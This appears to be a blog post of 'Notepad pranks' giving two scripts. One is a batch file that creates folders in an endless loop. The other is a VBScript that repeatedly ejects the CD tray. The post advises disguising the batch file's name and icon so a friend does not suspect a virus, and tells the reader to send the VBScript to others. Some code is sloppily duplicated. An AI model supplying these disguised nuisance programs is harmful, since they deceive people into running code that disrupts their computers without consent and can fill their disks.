How to create more than 3,000 folders under a minute?
1) Open your notepad and type or copy below code,
@echo off
:top
md %random%
goto top
:top
md %random%
goto top
2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to
make directory in ms-dos) go to top – return the command to :top, causes an infinite loop.
NOTE: The folders will get created in the directory where you saved the ”1000.bat” file. The file might look suspicious to your friends. So if you are looking to fool your friends, then change the file name and also the icon so that he doesn't suspect the file to be a virus.
Crazy Notepad trick to continuously popout cd tray
Please Copy below code to your notepad.
Set oWMP = CreateObject(“WMPlayer.OCX.7“)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count -1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
After that Save it as “cdtray.VBS” and send it.
Click here for comments 0 comments :